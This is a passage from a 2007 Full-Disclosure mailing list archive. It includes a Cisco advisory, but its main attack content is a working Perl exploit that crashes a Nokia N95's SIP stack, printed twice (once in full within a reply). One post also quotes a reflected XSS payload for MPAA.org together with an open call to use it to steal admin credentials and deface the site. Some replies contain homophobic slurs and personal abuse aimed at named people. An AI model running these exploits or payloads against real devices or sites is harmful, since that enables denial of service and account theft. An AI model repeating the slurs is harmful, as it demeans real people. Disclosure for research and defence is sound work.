perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>

 

Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu

 

 

#!/usr/bin/perl

 

##################################################

# Vulnerabily discovered using KiF ~ Kiph #

# #

# Authors: #

# Humberto J. Abdelnur (Ph.D Student) #

# Radu State (Ph.D) #

# Olivier Festor (Ph.D) #

# #

# Madynes Team, LORIA - INRIA Lorraine #

# HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr #

##################################################

 

use IO::Socket::INET;

use String::Random;

 

die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>" 

unless ($ARGV[3]);

 

$targetUser = $ARGV[1];

$targetIP = $ARGV[0];

 

$attackerUser = $ARGV[3];

$attackerIP= $ARGV[2];

 

$socket=new IO::Socket::INET->new(

Proto=>'udp',

PeerPort=>5060,

PeerAddr=>$targetIP,

LocalPort=>5060);

 

$foo = new String::Random;

$callid= $foo->randpattern("CCccnCn");

$cseq = $foo->randregex('\d\d\d\d');

 

$sdp = "v=0\r

o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r

s=-\r

c=IN IP4 $attackerIP\r

t=0 0\r

m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r

a=sendrecv\r

a=ptime:20\r

a=maxptime:200\r

a=fmtp:96 mode-change-neighbor=1\r

a=fmtp:18 annexb=no\r

a=fmtp:98 0-15\r

a=rtpmap:96 AMR/8000/1\r

a=rtpmap:0 PCMU/8000/1\r

a=rtpmap:8 PCMA/8000/1\r

a=rtpmap:97 iLBC/8000/1\r

a=rtpmap:18 G729/8000/1\r

a=rtpmap:98 telephone-event/8000/1\r

a=rtpmap:13 CN/8000/1\r

";

 

$sdplen= length $sdp;

 

$msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

From: <sip:$attackerUser\@$attackerIP>;tag=1\r

To: <sip:$targetUser\@$targetIP>\r

Call-ID: $callid\@$attackerIP\r

CSeq: $cseq INVITE\r

Max-Forwards: 70\r

Contact: <sip:$attackerUser\@$attackerIP>\r

Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, 

MESSAGE\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

$socket->send($msg);

$text = '';

while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){

$socket->recv($text,1024,0);

}

 

$msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

From: <sip:$attackerUser\@$attackerIP>;tag=1\r

To: <sip:$targetUser\@$targetIP>;tag=1\r

Call-ID: $callid\@$attackerIP\r

CSeq: $cseq CANCEL\r

Max-Forwards: 70\r

Content-Length: 0\r

\r

";

$socket->send($msg);

time.sleep(1);

$callid= $foo->randpattern("CCccnCn");

$cseq = $foo->randregex('\d\d\d\d');

$msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r

From: <sip:$attackerUser\@$attackerIP>;tag=2\r

To: <sip:$targetUser\@$targetIP>\r

Call-ID: $callid\@$attackerIP\r

CSeq: $cseq INVITE\r

Contact: <sip:$attackerUser\@$attackerIP>\r

Max-Forwards: 70\r

Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, 

MESSAGE\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

$socket->send($msg);

 

 

 


No virus found in this outgoing message.
Checked by AVG Free Edition. 
Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date: 04/12/2007
19:31
 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071205/d4a14e7d/attachment.html 

From ericuday at gmail.com  Wed Dec  5 16:49:28 2007
From: ericuday at gmail.com (uday kumar)
Date: Wed, 5 Dec 2007 11:49:28 -0500
Subject: [Full-disclosure] Information about recent malware exploited
	vulnerabilities - a blog post
Message-ID: <270bae7f0712050849r670fa48cmf166d6340e87e2b2@mail.gmail.com>

Hi, I wanted to share a blog post of mine about information regarding recent
vulnerabilities in Windows libraries and other application software that
have seen to be exploited by malware.
Could be of some help to anyone who is looking to find such information.

The link to my blog post is:

http://fightmalware.blogspot.com

Regards,
-- 
Eric Uday Kumar
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071205/0bb5c1a6/attachment.html 

From psirt at cisco.com  Wed Dec  5 18:06:57 2007
From: psirt at cisco.com (Cisco Systems Product Security Incident Response Team)
Date: Wed,  5 Dec 2007 13:06:57 -0500
Subject: [Full-disclosure] Cisco Security Advisory: Cisco Security Agent for
	Windows System Driver Remote Buffer Overflow Vulnerability
Message-ID: <200712051307.csa@psirt.cisco.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco Security Agent for Windows System Driver
Remote Buffer Overflow Vulnerability

Advisory ID: cisco-sa-20071205-csa

http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml

Revision 1.0

For Public Release 2007 December 05 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

A buffer overflow vulnerability exists in a system driver used by the
Cisco Security Agent for Microsoft Windows. This buffer overflow can be
exploited remotely and causes corruption of kernel memory, which leads
to a Windows stop error (blue screen) or to arbitrary code execution.

The vulnerability is triggered during processing of a crafted TCP
segment destined to TCP port 139 or 445. These ports are used by the
Microsoft Server Message Block (SMB) protocol.

Cisco has released free software updates that address this
vulnerability.

Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5580 has
been assigned to this vulnerability.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml.

Affected Products
=================

Vulnerable Products
+------------------

All versions of Cisco Security Agent for Windows, either managed
or standalone, are affected. Agents that are running on Cisco IP
Communications application servers or agents on systems that are running
the Cisco Security Manager are examples of a standalone implementation.

Standalone agents are installed in the following Cisco IP Communications
products:

  * Cisco Unified Communications Manager (CallManager)
  * Cisco Conference Connection (CCC)
  * Emergency Responder
  * IPCC Express
  * IPCC Enterprise
  * IPCC Hosted
  * IP Interactive Voice Response (IP IVR)
  * IP Queue Manager
  * Intelligent Contact Management (ICM)
  * Cisco Voice Portal (CVP)
  * Cisco Unified Meeting Place
  * Cisco Personal Assistant (PA)
  * Cisco Unity
  * Cisco Unity Connection
  * Cisco Unity Bridge
  * Cisco Internet Service Node (ISN)

Cisco Security Manager installs a standalone version of Cisco Security
Agent if an agent is not found when Cisco Security Manager is installed,
so systems that are running Cisco Security Manager are also affected by
this vulnerability.

Products Confirmed Not Vulnerable
+--------------------------------

The Cisco Secure Access Control Server (ACS) Solution Engine, also
known as the ACS appliance, integrates a standalone version of Cisco
Security Agent. However, the ACS Solution Engine is not affected by
this vulnerability because by default it blocks incoming traffic to
the affected TCP ports (139 and 445). Additional information is in the
Details section.

Cisco Security Agents that are running on the Solaris and Linux
operating systems are not affected by the vulnerability described in
this advisory.

No other Cisco products are currently known to be affected by this
vulnerability.

Details
=======

Cisco Security Agent is a security software agent that provides threat
protection for server and desktop computing systems. Cisco Security
Agents can be managed by a Management Center for Cisco Security Agents
or can be standalone agents that are not managed by a Cisco Security
Agent Management Center.

Some Cisco products integrate standalone Cisco Security Agents to
protect the products against viruses, worms, and attacks. Examples of
products that integrate standalone Cisco Security Agents include Cisco
IP Communications application servers, the Cisco Secure Access Control
Server (ACS) Solution Engine, and the Cisco Security Manager.

A buffer overflow vulnerability exists in a system driver used by Cisco
Security Agents, whether they are managed or unmanaged. Cisco Security
Agents use this driver by default.

Windows kernel memory becomes corrupted when this buffer is overflowed.
Therefore, exploitation of this vulnerability will lead to a Windows
stop error (kernel panic, or blue screen error), or to arbitrary code
execution. The vulnerability can be exploited remotely via the network.

The vulnerability is triggered when Cisco Security Agent is processing
a crafted TCP segment destined to TCP port 139 or 445. These ports are
used by the Microsoft Server Message Block (SMB) protocol. A TCP session
needs to be established (that is, the TCP three-way handshake needs to
be completed) for the vulnerability to be triggered.

All systems that are running a vulnerable version of Cisco Security
Agent for Windows are affected. This includes Cisco products that
integrate standalone Cisco Security Agents, such as Cisco IP
Communications applications servers and the Cisco Security Manager.
Although the ACS Solution Engine integrates a standalone Cisco Security
Agent, it is not affected because TCP ports 139 and 445 have been
firewalled by the ACS Solution Engine itself. This blocking of traffic
destined to TCP ports 139 and 445 is enabled by default and is not
user-configurable.

This vulnerability is documented in Cisco bug ID CSCsl00618.

The CVE identifier CVE-2007-5580 has been assigned to this
vulnerability.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerability in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco has provided a FAQ to answer additional questions regarding CVSS
at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss.

* Buffer overflow in system driver causes BSOD (CSCsl00618)

CVSS Base Score - 10.0
    Access Vector -            Network
    Access Complexity -        Low
    Authentication -           None
    Confidentiality Impact -   Complete
    Integrity Impact -         Complete
    Availability Impact -      Complete

CVSS Temporal Score - 8.3
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed

Impact
======

Successful exploitation of the buffer overflow vulnerability described
in this advisory may result in an operating system crash or complete
system compromise.

Software Versions and Fixes
===========================

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Managed Cisco Security Agents
+----------------------------

Fixed software for managed Cisco Security Agents is available in the
form of hotfixes. The following table contains hotfix information for
the current supported versions of Cisco Security Agent. Future versions
of Cisco Security Agent will have the fix included.

+----------------------------------------+
| Affected Cisco Security  |   Hotfix    |
|      Agent Version       |   Version   |
|--------------------------+-------------|
| 4.5.1                    | Hotfix      |
|                          | 4.5.1.672   |
|--------------------------+-------------|
| 5.0                      | Hotfix      |
|                          | 5.0.0.225   |
|--------------------------+-------------|
| 5.1                      | Hotfix      |
|                          | 5.1.0.106   |
|--------------------------+-------------|
| 5.2                      | Hotfix      |
|                          | 5.2.0.238   |
+----------------------------------------+

Cisco Security Agent hotfixes can be downloaded from the following
location:

http://www.cisco.com/cgi-bin/tablebuild.pl/csahf-crypto?psrtdcat20e2

Cisco Security Agent for Cisco IP Communications Products
+--------------------------------------------------------

The following table contains information about Cisco Security Agent
fixes for Cisco IP Communications products:

+--------------------------------------------+
| Affected |                                 |
|  Cisco   |                                 |
| Security |         Fixed Software          |
|  Agent   |                                 |
| Version  |                                 |
|----------+---------------------------------|
| 4.5.1    | CUCM-CSA-4.5.1.672-2.0.7-k9.exe |
|----------+---------------------------------|
| 5.0      | CUCM-CSA-5.0.0.225-3.0.7-k9.exe |
+--------------------------------------------+

These fixes can be downloaded from the following location:

http://www.cisco.com/cgi-bin/tablebuild.pl/cmva-3des?psrtdcat20e2

Cisco Security Agent for Cisco Security Manager
+----------------------------------------------

A fixed standalone Cisco Security Agent for the Cisco
Security Manager is provided in the form of the hotfix
fcs-csamc-hotfix-5.2.0.238-w2k3-k9-CSM.zip, which is available for
download from:

http://www.cisco.com/cgi-bin/tablebuild.pl/csm-app?psrtdcat20e2.

Workarounds
===========

General Considerations
+---------------------

Filters that deny SMB protocol packets using TCP ports 139 and 445
should be deployed as part of a transit access control list (tACL)
policy for protection from traffic that enters the network at ingress
access points. This policy should be configured to protect the network
device where the filter is applied and other devices behind it. Filters
for SMB protocol packets using TCP ports 139 and 445 should also be
deployed in front of vulnerable hosts so that traffic is allowed only
from trusted clients.

Additional information about tACLs is available in "Transit Access
Control Lists : Filtering at Your Edge":

http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml

Additional mitigation techniques that can be deployed on Cisco devices
within the network are available in the Cisco Applied Mitigation
Bulletin companion document for this advisory:

http://www.cisco.com/warp/public/707/cisco-amb-20071205-csa.shtml

Cisco Security Agent Rule to Block TCP Port 139 and 445 Traffic
+--------------------------------------------------------------

Workstations that do not have a need to provide SMB services, such as
services for sharing directories or files and printers, can be protected
by configuring a Cisco Security Agent rule that blocks all traffic to
TCP ports 139 and 445 (the SMB ports).

Such a rule exists in versions of Cisco Security Agent that include
the Network Personal Firewall policy. The specific rule can be found
by searching rules for one that has the description "All applications,
server for SMB services (offering network shares)" or by opening the
Personal Firewall Module rule module (attached to the Network Personal
Firewall policy) and editing the rule that has this description. This
rule is enabled by default but the default action must be changed from
Allow to a High Priority Deny.

If the Network Personal Firewall policy is not available, administrators
can create a network access rule that blocks traffic to TCP ports 139
and 445. To do this, the rule must be configured as a Deny rule so
traffic is denied when the system on which Cisco Security Agent is
installed attempts to act as a server for network services on ports TCP
139 and 445. For additional information on configuring Cisco Security
Agent network access control rules, reference the following document:

http://www.cisco.com/en/US/docs/security/csa/csa52/user_guide/Chap6.html#wp1199624.

Caution: Blocking TCP ports 139 and 445 on a Windows system will cause
the Windows system to stop providing SMB services. Before implementing
the workarounds presented in this section, administrators are advised to
ensure that they understand the implications of disabling SMB services
on users' workstations.

Obtaining Fixed Software
========================

Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt at cisco.com or security-alert at cisco.com for software
upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows:

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac at cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was reported to Cisco by the NSFocus Security Team
(http://www.nsfocus.com). Cisco would like to thank the NSFocus Security
Team for reporting this vulnerability and working with us towards
resolution of this problem.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml

In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.

  * cust-security-announce at cisco.com
  * first-teams at first.org
  * bugtraq at securityfocus.com
  * vulnwatch at vulnwatch.org
  * cisco at spot.colorado.edu
  * cisco-nsp at puck.nether.net
  * full-disclosure at lists.grok.org.uk
  * comp.dcom.sys.cisco at newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.

Revision History
================

+-------------------------------------------------------------+
| Revision 1.0 | 2007-December-05  | Initial public release.  |
+-------------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
 This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.

+--------------------------------------------------------------------
All contents are Copyright (C) 2006-2007 Cisco Systems, Inc. All rights
reserved.
+--------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHVuh586n/Gc8U/uARAv1iAJ9Bd0AHbbJYSVDHCjunVqSt/8wuTwCfU2qj
HAfK0DW2cJ4+nR9hH2nOOmk=
=ZQXL
-----END PGP SIGNATURE-----



From reepex at gmail.com  Wed Dec  5 19:21:06 2007
From: reepex at gmail.com (reepex)
Date: Wed, 5 Dec 2007 13:21:06 -0600
Subject: [Full-disclosure] Nokia N95 cellphone remote DoS using the SIP
	Stack
In-Reply-To: <003c01c83760$faac19b0$5e0c5198@Crocodile>
References: <003c01c83760$faac19b0$5e0c5198@Crocodile>
Message-ID: <e9d9d4020712051121x17f0f81bk2745fb3c2e7b9d83@mail.gmail.com>

So almighty Phd what is your thesis exactly?

To me it seems to be  'how to run a fuzzer then write crappy perl  scripts
to exploit DoS conditions'

does this properly summarize your phd credentials?

I guess  you could tack on 'after writing the crappy scripts, flood mailing
lists with our crap, and get made fun of'

I am sure you will serve the academic community great one day when teach
"hacking" classes revolving around the latest editions of hacking exposed



On Dec 5, 2007 11:05 AM, Radu State <State at loria.fr> wrote:

>  Nokia N95 cellphone remote DoS using the SIP Stack
>
>
>
> Severity:
>
> High ? Denial of Service
>
>
>
> Hardware:
>
> Nokia N95
>
>
>
> Firmware:
>
> Tested version: Nokia RM-159 V 12.0.013
>
>
>
> Notification:
>
> Vulnerability found: 11 September 2007
>
> Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
> Security Support: 19 September 2007 / None reply
>
>
>
> Vulnerability Synopsis:
>
> If the device has the SIP Phone client activated, a sequence of SIP
> messages turn the device in an inconsistent state where the user is not able
> to operate it anymore until it reboots.
>
>
>
> The sequence of messages consists in 2 different SIP Dialogs where the
> first initiates an INVITE transaction but immediately closes it (in an
> anticipated manner). While, the second transaction initiates a normal INVITE
> transaction that trigger the vulnerability of the target.
>
>
>
> The sequence of messages is illustrated below.
>
>
>
> X ------------------------- INVITE -----------------------> Nokiav12
>
> X <---------------------- 100 Trying ---------------------- Nokiav12
>
> X ------------------------- CANCEL -----------------------> Nokiav12
>
> X <----------------- OK (to the Cancel) ------------------- Nokiav12
>
>  X <---------------- 487 Request Terminated ---------------- Nokiav12
>
>
>
> --------New Dialog--------
>
>
>
> X ------------------------- INVITE -----------------------> Nokiav12
>
> X <---------------------- 100 Trying ---------------------- Nokiav12
>
> X <---------------------- 180 Trying ---------------------- Nokiav12
>
>
>
> ---- The device does not work properly anymore ----
>
>
>
> Impact:
>
> A remote entity can take down all the services of the cell phone
>
>
>
> Resolution:
>
> As we did not get any proper reply from Nokia about the subject, the best
> way will be to disable the SIP Client
>
>
>
> Credits:
>
> Humberto J. Abdelnur (Ph.D Student)
>
> Radu State (Ph.D)
>
> Olivier Festor (Ph.D)
>
>
>
> This vulnerability was identified by the Madynes research team at INRIA
> Lorraine, using KiF the Madynes VoIP fuzzer.
>
> http://madynes.loria.fr/
>
>
>
>
>
> Proof of Concept:
>
>
>
> A perl script (nokiav12.pl) is attached to this mail. Before launching
>
> it, the SIP phone has to be initialed in the target device
>
>
>
> Command:
>
> perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>
>
>
>
> Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu
>
>
>
>
>
> #!/usr/bin/perl
>
>
>
> ##################################################
>
> # Vulnerabily discovered using KiF ~ Kiph #
>
> # #
>
> # Authors: #
>
> # Humberto J. Abdelnur (Ph.D Student) #
>
> # Radu State (Ph.D) #
>
> # Olivier Festor (Ph.D) #
>
> # #
>
> # Madynes Team, LORIA - INRIA Lorraine #
>
> # http://madynes.loria.fr #
>
> ##################################################
>
>
>
> use IO::Socket::INET;
>
> use String::Random;
>
>
>
> die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
>
> unless ($ARGV[3]);
>
>
>
> $targetUser = $ARGV[1];
>
> $targetIP = $ARGV[0];
>
>
>
> $attackerUser = $ARGV[3];
>
> $attackerIP= $ARGV[2];
>
>
>
> $socket=new IO::Socket::INET->new(
>
> Proto=>'udp',
>
> PeerPort=>5060,
>
> PeerAddr=>$targetIP,
>
> LocalPort=>5060);
>
>
>
> $foo = new String::Random;
>
> $callid= $foo->randpattern("CCccnCn");
>
> $cseq = $foo->randregex('\d\d\d\d');
>
>
>
> $sdp = "v=0\r
>
> o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
>
> s=-\r
>
> c=IN IP4 $attackerIP\r
>
> t=0 0\r
>
> m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
>
> a=sendrecv\r
>
> a=ptime:20\r
>
> a=maxptime:200\r
>
> a=fmtp:96 mode-change-neighbor=1\r
>
> a=fmtp:18 annexb=no\r
>
> a=fmtp:98 0-15\r
>
> a=rtpmap:96 AMR/8000/1\r
>
> a=rtpmap:0 PCMU/8000/1\r
>
> a=rtpmap:8 PCMA/8000/1\r
>
> a=rtpmap:97 iLBC/8000/1\r
>
> a=rtpmap:18 G729/8000/1\r
>
> a=rtpmap:98 telephone-event/8000/1\r
>
> a=rtpmap:13 CN/8000/1\r
>
> ";
>
>
>
> $sdplen= length $sdp;
>
>
>
> $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
>
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
>
> From: <sip:$attackerUser\@$attackerIP>;tag=1\r
>
> To: <sip:$targetUser\@$targetIP>\r
>
> Call-ID: $callid\@$attackerIP\r
>
> CSeq: $cseq INVITE\r
>
> Max-Forwards: 70\r
>
> Contact: <sip:$attackerUser\@$attackerIP>\r
>
> Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
>
> MESSAGE\r
>
> Content-Type: application/sdp\r
>
> Content-Length: $sdplen\r
>
> \r
>
> $sdp";
>
> $socket->send($msg);
>
> $text = '';
>
> while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){
>
> $socket->recv($text,1024,0);
>
> }
>
>
>
> $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
>
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
>
> From: <sip:$attackerUser\@$attackerIP>;tag=1\r
>
> To: <sip:$targetUser\@$targetIP>;tag=1\r
>
> Call-ID: $callid\@$attackerIP\r
>
> CSeq: $cseq CANCEL\r
>
> Max-Forwards: 70\r
>
> Content-Length: 0\r
>
> \r
>
> ";
>
> $socket->send($msg);
>
> time.sleep(1);
>
> $callid= $foo->randpattern("CCccnCn");
>
> $cseq = $foo->randregex('\d\d\d\d');
>
> $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
>
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
>
> From: <sip:$attackerUser\@$attackerIP>;tag=2\r
>
> To: <sip:$targetUser\@$targetIP>\r
>
> Call-ID: $callid\@$attackerIP\r
>
> CSeq: $cseq INVITE\r
>
> Contact: <sip:$attackerUser\@$attackerIP>\r
>
> Max-Forwards: 70\r
>
> Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
>
> MESSAGE\r
>
> Content-Type: application/sdp\r
>
> Content-Length: $sdplen\r
>
> \r
>
> $sdp";
>
> $socket->send($msg);
>
>
>
>
>
>
>
> No virus found in this outgoing message.
> Checked by AVG Free Edition.
> Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date:
> 04/12/2007 19:31
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071205/f3e2a2ad/attachment.html 

From i.am.hambeast at gmail.com  Wed Dec  5 19:31:07 2007
From: i.am.hambeast at gmail.com (Ham Beast)
Date: Wed, 5 Dec 2007 11:31:07 -0800
Subject: [Full-disclosure] 0day XSS for MPAA.org
In-Reply-To: <fe37588d0712042026o6a385459t4a1cea0ab86bd540@mail.gmail.com>
References: <fe37588d0712042026o6a385459t4a1cea0ab86bd540@mail.gmail.com>
Message-ID: <f3605ab90712051131x3b2403aak44db0f3b499b72cc@mail.gmail.com>

Ol? Kristian Hermafroditas you useless fagot, shoes of clown are apparent.

Hambeast returned to specifically noted that, for someone who is
trying really hard to find a job (and NOT find) you really are much
not doing to endear themselves to potential employers. You pick a
fight with Microsoft (question: who is one of the largest in the
industry employers of 3rd party security consultants?) And then post
into the full disclosure all proud that you found a XSS on a site that
has no visibility LOGIN PAGE OR NOTHING and encourage the hacking for
this internet site and committing criminal activities.

His signature is so apt. You have no special talent. Or even any
skills or talents at all. Indeed, the only thing hambeast can see that
Kristian Hermafroditas is good is the appearance of a fucking idiot
and also to release the names of several other people in the security
industry that Hambeast believe has most likely never even heard of
your stupid faggoty auto.

I encourage everyone to the google for the "exploits", written by
Kristian Hermafroditas. It is very good for some laughs believe!

Basicamente, apply to Symantec as a helpdesk or support customer is
best chance for future you.

Moreover,
Hambeast would like to extend Greetings and Salutations on the return
of GOBBLES, I am very anxious to see your Matasano on blog. Finally
someone says Thomas Ptacek to SHUT THE UP FUCK AND CLOSE HIS FAT
FUCKING MOUTH STUPID. Hoorah! (Hambeast the name fat stupid mouth
Thomas Ptacek is from !)

On 12/4/07, Kristian Erik Hermansen <kristian.hermansen at gmail.com> wrote:
> As many of you have heard, the MPAA themselves are violating the GNU
> GPL.  Such hypocrisy from a company which claims they adhere to
> copyrights :-)  In protest, I took exactly 7 seconds to locate an XSS
> in their website and am posting it for your perusal.  Maybe someone
> can use it in an email to an MPAA staff member, and perhaps can modify
> the payload to steal credentials for some MPAA admin interface.  And
> perhaps then, after gaining MPAA credentials, this person can modify
> the MPAA website.  And perhaps after that, we can all laugh at the
> MPAA yet again in their quest to sue 12 year old kids for downloading
> MP3 files...
>
> There are many more XSS on their site.  Everyone knows that if you
> find one bug on top (without much effort), there are many more
> security issues hiding beneath the surface.  I leave it up to the
> MPPA-haters out there to dig deeper and use it to "influence" the MPAA
> website...
>
> Here's one for the 'txtsearch' search field on the main page at
> MPAA.org in the top right-hand corner where it says 'Find the rating
> of a film'...
> ERR"></tr></table></td><script>alert('xss');</script>
> --
> Kristian Erik Hermansen
> "I have no special talent. I am only passionately curious."
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From coderman at gmail.com  Wed Dec  5 19:54:26 2007
From: coderman at gmail.com (coderman)
Date: Wed, 5 Dec 2007 11:54:26 -0800
Subject: [Full-disclosure] GOBBLES or n3td3v
Message-ID: <4ef5fec60712051154k1bdbe14dn4d82911220979e2@mail.gmail.com>

On Dec 5, 2007 11:31 AM, Ham Beast <i.am.hambeast at gmail.com> wrote:
> ...
> Hambeast would like to extend Greetings and Salutations on the return
> of GOBBLES

silly hambeast, it is not GOBBLES until blessed by his majesty,
 Dr. Neal Krawetz, PhD.

"L'enfer, c'est les autres" - Sartre



From reepex at gmail.com  Wed Dec  5 19:54:54 2007
From: reepex at gmail.com (reepex)
Date: Wed, 5 Dec 2007 13:54:54 -0600
Subject: [Full-disclosure] Nokia N95 cellphone remote DoS using the SIP
	Stack
In-Reply-To: <003c01c83760$faac19b0$5e0c5198@Crocodile>
References: <003c01c83760$faac19b0$5e0c5198@Crocodile>
Message-ID: <e9d9d4020712051154w5961f441g5c6cf50f74ebbc2b@mail.gmail.com>

On Dec 5, 2007 11:05 AM, Radu State <State at loria.fr> wrote:

> # Humberto J. Abdelnur (Ph.D Student) #
>
> # Radu State (Ph.D) #
>
> # Olivier Festor (Ph.D) #
>
lol......

"wow" is all i can say to this..

let me enlighten you on the basics of Perl


> $text = '';
>

